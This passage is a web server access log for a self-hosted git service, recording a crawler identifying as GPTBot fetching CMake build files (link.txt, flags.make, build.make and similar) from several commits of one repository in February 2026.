+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13301] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15267] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11192] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13306] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11191] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10098] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11491] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15264] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14248] [Gzip 8.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10524] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14251] [Gzip 8.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10093] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14029] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14029] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11165] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11186] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11489] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11490] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10092] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11167] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11487] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14029] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10013] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10088] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 